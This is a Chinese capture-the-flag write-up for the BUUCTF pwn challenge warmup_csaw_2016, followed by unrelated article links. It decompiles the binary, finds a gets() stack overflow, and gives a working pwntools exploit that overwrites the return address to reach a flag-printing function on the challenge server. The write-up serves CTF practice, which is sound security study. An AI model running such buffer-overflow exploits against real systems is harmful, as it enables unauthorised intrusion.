buuctf PWN warmup_csaw_2016

下载附件,IDA查看

发现直接有显示flag函数

复制代码
int sub_40060D()
{
  return system("cat flag.txt");
}

查看程序起始地址0x40060D

复制代码
; Attributes: bp-based frame

sub_40060D proc near
; __unwind {
push    rbp
mov     rbp, rsp
mov     edi, offset command ; "cat flag.txt"
call    _system
pop     rbp
retn
; } // starts at 40060D
sub_40060D endp

查看main函数

复制代码
__int64 __fastcall main(int a1, char **a2, char **a3)
{
  char s[64]; // [rsp+0h] [rbp-80h] BYREF
  char v5[64]; // [rsp+40h] [rbp-40h] BYREF

  write(1, "-Warm Up-\n", 0xAuLL);
  write(1, "WOW:", 4uLL);
  sprintf(s, "%p\n", sub_40060D);
  write(1, s, 9uLL);
  write(1, ">", 1uLL);
  return gets(v5);
}

发现函数gets(v5),是栈溢出

char v5[64]; // [rsp+40h] [rbp-40h] BYREF

看到v5占用64个位置

那就可以改写exp:

复制代码
from __future__ import absolute_import
from pwn import *  
p=remote(u"node4.buuoj.cn",29692) 
payload=u'A'*64+u'B'*8+p64(0x40060D+1).decode(u"iso-8859-1")
p.sendline(payload)
p.interactive()

运行结果

相关推荐
渣哥10 小时前
Java 集合迭代中的 fail-fast 与 fail-safe 机制详解
java
土了个豆子的10 小时前
02.继承MonoBehaviour的单例模式基类
开发语言·visualstudio·单例模式·c#·里氏替换原则
帧栈10 小时前
我的创作纪念日
java
qq_1728055910 小时前
Go 自建库的使用教程与测试
开发语言·后端·golang
yongui4783410 小时前
CentOS系统如何查看当前内存容量
linux·运维·centos
久绊A10 小时前
Hydra-SSH 破解安全防范
开发语言·php
xzq_java10 小时前
CentOS操作系统虚拟机安装以及连接工具下载和远程连接工具远程连接
linux·运维·centos
黑白世界464810 小时前
开源分享: php-tools php gui的一次尝试
后端·php
阿昭L10 小时前
c++中获取随机数
开发语言·c++
3壹10 小时前
数据结构精讲:栈与队列实战指南
c语言·开发语言·数据结构·c++·算法